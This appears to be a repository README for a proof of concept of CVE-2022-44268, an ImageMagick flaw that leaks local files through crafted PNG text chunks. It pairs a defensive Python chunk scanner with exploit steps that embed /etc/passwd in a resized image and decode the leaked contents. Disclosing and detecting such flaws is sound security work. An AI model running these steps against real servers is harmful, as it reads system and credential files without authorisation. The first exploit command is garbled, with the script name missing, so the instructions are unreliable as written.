# CVE-2022-44268

This repository contains a Proof of Concept (POC) for a vulnerability in [ImageMagick]( (v. 7.1.0-49), a widely used open-source image manipulation library. The vulnerability allows an attacker to embed the content of an arbitrary file into a resized image when ImageMagick parses a PNG file.

## Description

When ImageMagick performs operations such as resizing on a PNG file, it may include the content of a system file, given that the magick binary has the necessary permissions to read it. This vulnerability arises due to the mishandling of textual chunks within PNG files.

A malicious actor can exploit this vulnerability by crafting a PNG file, or taking an existing one, and adding a textual chunk (type `tEXt`). These chunks consist of a keyword and a text string. If the keyword matches the string "profile" (without quotes), ImageMagick interprets the accompanying text string as a filename and attempts to load its content as a raw profile. As a result, when the resized image is downloaded, it contains the content of the file the attacker named, read from the host on which ImageMagick ran.

For more information, see [this article from MetabaseQ](
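
As an added defensive example (not code from this repository), the following Python scanner walks a PNG's chunk stream, checks every chunk's length and CRC, and reports any `tEXt`, `zTXt` or `iTXt` chunk whose keyword is exactly `profile`, which is the condition described above. The sample PNG it builds, and the `/placeholder/path` inside it, are constructed test data.

```python
import struct, zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}  # each starts with a NUL-terminated keyword

def iter_chunks(data: bytes):
    """Yield (type, payload) for every chunk, validating lengths and CRCs on the way."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length
        if end + 4 > len(data):
            raise ValueError(f"truncated {ctype!r} chunk")
        payload = data[pos + 8:end]
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != struct.unpack(">I", data[end:end + 4])[0]:
            raise ValueError(f"bad CRC on {ctype!r} chunk")
        yield ctype, payload
        pos = end + 4

def find_profile_keywords(data: bytes) -> list:
    """Return (chunk type, text) for each textual chunk whose keyword is exactly 'profile'."""
    hits = []
    for ctype, payload in iter_chunks(data):
        if ctype not in TEXT_CHUNKS:
            continue
        keyword, _, rest = payload.partition(b"\x00")
        if keyword != b"profile":
            continue
        if ctype == b"zTXt":    # one compression-method byte, then a zlib stream
            rest = zlib.decompress(rest[1:])
        elif ctype == b"iTXt":  # flag, method, language tag, translated keyword, text
            text = rest[2:].split(b"\x00", 2)[2]
            rest = zlib.decompress(text) if rest[0] == 1 else text
        hits.append((ctype.decode("ascii"), rest.decode("latin-1", "replace")))
    return hits

def build_chunk(ctype: bytes, payload: bytes) -> bytes:  # builds one chunk for the fixture below
    crc = struct.pack(">I", zlib.crc32(ctype + payload) & 0xFFFFFFFF)
    return struct.pack(">I", len(payload)) + ctype + payload + crc

# Constructed 1x1 grayscale PNG carrying a 'profile' tEXt chunk; the path is a placeholder.
SAMPLE_PNG = PNG_SIG + b"".join(build_chunk(t, p) for t, p in [
    (b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)),
    (b"tEXt", b"profile\x00/placeholder/path"),
    (b"IDAT", zlib.compress(b"\x00\x00")), (b"IEND", b"")])
```

Running `find_profile_keywords` over uploads before they reach ImageMagick, or rejecting files on which it raises or returns hits, gives a cheap pre-processing check; a CRC failure is itself a reason to reject the file.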

## Proof of Concept

To exploit ImageMagick, generate a malicious PNG:

```shell
python3 /etc/passwd  # Create output.png
```

Then, run a resize operation with `convert`:

```shell
convert output.png -resize 50% leak.png
```

Finally, inspect the leaked image; the embedded file appears hex-encoded under `Raw profile`, so decode that hex string back into bytes:

```shell
identify -verbose leak.png
# ...
# Raw profile type:
#
# 726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]
```

```shell
python -c "print(bytes.fromhex('726f6f743a783a303a303a726f6f743a2f726f6f743a2f6269 [...]'))"
```

> Note: This POC is intended for educational and informational purposes only. Please ensure that you have the necessary permissions and legal authorization before testing or using this POC on any system.